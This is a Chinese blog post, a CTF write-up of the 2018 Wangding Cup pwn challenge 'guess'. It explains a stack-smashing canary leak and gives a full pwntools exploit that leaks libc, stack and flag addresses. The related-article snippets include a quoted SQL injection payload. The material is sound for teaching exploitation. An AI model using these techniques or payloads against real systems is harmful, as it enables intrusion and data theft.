网鼎杯2018 guess(stack smashing)

最新推荐文章于 2023-07-30 13:49:23 发布
最新推荐文章于 2023-07-30 13:49:23 发布
阅读量918 收藏 1
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105861758
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

wdb2018_guess stack smashing

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

Flag读取并存储在栈里

Fork三次子进程,然后有gets函数,导致栈溢出,但是有canary保护。

由于使用了gets,因此可以无限制溢出,并且有三次机会。那么,我们可以利用stack smashing报错,来输出信息。第一次,我们泄露函数的got表内容,为了得到glibc地址。得到glibc地址,是为了计算出stack_end变量的地址,进而,第二次,我们泄露栈地址,计算出flag存放的地址,于是,第三次,我们就可以泄露flag的值。

#coding:utf8
from pwn import *
from LibcSearcher import *

#sh = process('./GUESS')
sh = remote('node3.buuoj.cn',29890)
elf = ELF('./GUESS')
puts_got = elf.got['puts']

def stackoverflow(payload):
   sh.sendlineafter('Please type your guessing flag',payload)

#泄露puts地址
stackoverflow('a'*0x128 + p64(puts_got))
sh.recvuntil('stack smashing detected ***: ')
puts_addr = u64(sh.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
environ_addr = libc_base + libc.dump('__environ')
print 'environ_addr=',hex(environ_addr)
#泄露栈地址
stackoverflow('a'*0x128 + p64(environ_addr))
sh.recvuntil('stack smashing detected ***: ')
stack_addr = u64(sh.recv(6).ljust(8,'\x00'))
flag_addr = stack_addr - 0x168
print 'flag_addr=',hex(flag_addr)
#泄露flag
stackoverflow('a'*0x128 + p64(flag_addr))

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
杯pwn之GUESS
Peanuts
08-30 1916
做了杯才发现自己有多菜。。。 拿到题目先ida一波 基本分析 看到了发现了是一个本地加载flag.txt所以有可能可以用stack samsh:详细可以看ctf wiki上的花式栈溢出技巧然后拖入gdb 进行一波checksec             可以发现有了nx栈不可执行这个还好,但是看到了cannary就有点头疼了。。还好有stack smash这个方法可以...
[杯 2024]Fakebook,阿里架构师深入讲解络安全开发
最新发布
weixin_58152093的博客
04-15 1022
(2) -1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name=‘user’# 爆出no,username,passwd,data。费时一周整理的160+络安全面试题,金九银十,做络安全面试里的显眼包!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!,大家跟着这个大的方向学习准没问题。
GUESS
doudoudedi
10-18 249
3次覆盖__libc_argv[0]然后泄露出put的真实地址然偶clac出libc然后泄露出environ里面存的栈地址然后计算flag在栈上的偏移再次泄露即可 exp: from pwn import * from LibcSearcher import * p=process('./GUESS') elf=ELF('./GUESS') libc=ELF('/lib/x86_64-linux-...
PWN GUESS
SsMing的博客
09-11 1677
拖了好久才看题,中间去参加比赛去了,休息够了开始学习啦! GUESS 在checksec查看后,发现开了canary 和 NX保护,所以可以用 stack smash 来做这个题 ida打开,查看一下源代码: 发现程序自己把读取flag到了栈中,所以思路就是: 1.通过覆盖argv[0]先泄露puts的地址 2.通过泄漏的puts的地址,计算出基地址然后泄漏出environ的...
GUESS-萌新分析
TedLau的博客
05-07 490
0x00 前言 学一下往年的杯,,,,,好让自己心里有点数 确实,我好菜。 0x10 信息收集 通过ida打开。可以发现有flag.txt字样,,又发现让猜,,,嗯,,是stack smash,别的大佬说的,,我今天才学这个知识点。 0x 20 分析 0x 21 关键源码分析 分析stack smash的源码,可以看到,如果我们破坏了canary,然后系统就...
wdb2018_guess
z1r0的博客
01-19 1005
wdb2018_guess 查看保护 这里开了canary,溢出时会报错 可以看到报错后面会输出程序名字,既然flag被放到了栈上是不是也可以被输出。 environ是libc中存储栈地址的一个变量,可以通过environ算出与flag的偏移,再将flag通过canary来输出。 想要知道environ的地址还需要知道libc的地址,libc的地址可以通过got来算。 那么第一步就是需要算出argv[0]与gets这个地方ebp-0x40的偏移。 argv[0]的地址为0x7fffffffdeb8,
Buffer_Overflows_b.rar_c/C++_stack smashing_漏洞_缓冲区溢出
07-14
顶尖高手讲的缓冲区溢出漏洞原理及实例代码分析,C,汇编。千万别错过,很难得的资料哟
Stack-Smashing:现代 Linux 系统上的堆栈粉碎
06-09
堆栈粉碎 项目报告可以在找到。 64 位版本正在开发中。
C语言头文件 STACK
06-13
C语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 STACKC语言头文件 ...
stack_smashing
05-09
一本很不错的overflow书籍,帮助学习overflow
smashing the stack for fun and profit
04-14
smashing the stack for fun and profit翻译
BUUCYF之“wdb2018_guess
Probeginner的博客
12-18 299
stack smash的使用
【PWN · Stack Smash】[2021 鹤城杯]easyecho
Mr_Fmnwon的博客
07-30 648
Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出题目,因此重点(但非详细)阐述我所理解的重点部分。
[BUUCTF-pwn]——wdb2018_guess (environ环境变量)
Y_peak的博客
04-06 1318
[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路 思路来了 利用主动触发canary保护, 调用**
171119 Pwn-StackSmash
whklhhhh的博客
11-24 974
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
wdb2018_guessstack smash
Tw0的博客
02-14 154
巩固一下stack smash技术,了解elf程序的运行环境参数。
wdb2018_guess fork()和wait()的问题
carol2358的博客
09-02 371
这个问题困扰了我,程序动脑不如动手,就写了一个程序来判断,问题的来源是wdb2018_guess 这道题 他fork()了三次,却只有3次gets(),我想着明明有4个进程,为什么只gets了3次 #include<stdio.h> #include <sys/types.h> #include <unistd.h> #include<sys/wait.h> int main() { int stat_loc; int i=0; int n=3; in
wdb2018_guess-___stack_chk_fail泄露信息
qq_40712959的博客
11-03 371
背景知识 在程序添加了canary保护后,如果我们读取的bof覆盖了对应的值时,程序就会报错,我们可以利用报错信息。 程序在启动canary保护之后,如果发现canary被修改的话,程序就会执行__stack_chk_fail函数来打印argv[0]指针所指向的字符串,正常情况下,这个指针指向程序名。很简单,只要我们可以控制argv[0],就能知道我们想知道的信息。 void __attribute__ ((noreturn)) __stack_chk_fail (void) { __forti
[BUUCTF]PWN——wdb2018_guessstack smashing--canary报错利用)
mcmuyanga的博客
03-14 1155
wdb2018_guess 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况 64位ida载入 存在溢出利用点,但是有canary保护,这边39行和41行的puts函数是写死的,没法用来接收泄露的信息,想到了利用canary的报错输出 在程序加了 carry 保护后,如果我们的输入覆盖了 carry ,程序就会报错,报错代码如下,可以看到,程序会执行 __stack_chk_fail 函数来打印 __libc_argv[0] 指针所指向的字符串(默认存储的是程序的名称)
stack smashing detected
01-30
"stack smashing detected"是一个错误消息,它表示在程序执行过程中发生了堆栈溢出。堆栈溢出是指当一个程序尝试向堆栈中写入超过其分配的内存空间时发生的情况。 堆栈溢出通常是由于以下原因之一引起的: 1. 缓冲...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值